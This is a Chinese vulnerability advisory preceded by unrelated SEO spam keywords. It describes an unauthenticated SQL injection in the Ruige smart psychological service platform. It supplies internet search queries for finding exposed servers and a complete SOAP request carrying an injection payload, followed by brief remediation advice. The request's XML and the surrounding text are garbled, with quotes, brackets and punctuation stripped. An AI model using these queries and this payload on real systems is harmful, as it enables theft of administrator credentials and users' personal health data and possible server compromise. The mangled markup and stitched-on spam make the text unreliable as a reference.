第二代营销网站,网站有哪些内容,太原网站推广教程,国际大新闻最新消息0x01 产品描述#xff1a; 瑞格智慧心理服务平台是一个集心理测评、心理咨询、心理危机干预、心理放松训练等功能于一体的综合性心理健康服务平台。该平台由北京瑞格心灵科技有限公司开发#xff0c;旨在为用户提供全方位的心理健康服务。0x02 漏洞描述#xff1a;…0x01 产品描述 瑞格智慧心理服务平台是一个集心理测评、心理咨询、心理危机干预、心理放松训练等功能于一体的综合性心理健康服务平台。该平台由北京瑞格心灵科技有限公司开发旨在为用户提供全方位的心理健康服务。0x02 漏洞描述 瑞格智慧心理服务平台 /NPreenSMSList.asmx接口存在未授权SQL注入漏洞未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息例如管理员后台密码、站点的用户个人信息之外甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。0x03 搜索语句
Fofabody瑞格智慧心理服务平台
Hunterweb.body瑞格智慧心理服务平台
0x04 漏洞复现
POST /NPreenManage/NPreenSMSList.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charsetutf-8
Content-Length: length
SOAPAction: RuiGe.WebUi.NPreenSMS/Seach?xml version1.0 encodingutf-8?
soap:Envelope xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xmlns:xsdhttp://www.w3.org/2001/XMLSchema xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/soap:BodySeach xmlnsRuiGe.WebUi.NPreenSMSsqlwhereand 1convert(int,db_name())/sqlwhere/Seach/soap:Body
/soap:Envelope 0x05 修复建议 建议对所有输入数据进行严格验证并使用参数化查询。同时应限制数据库用户的权限仅授予执行必要操作所需的最低权限。定期进行安全审计以发现并修复潜在的安全漏洞。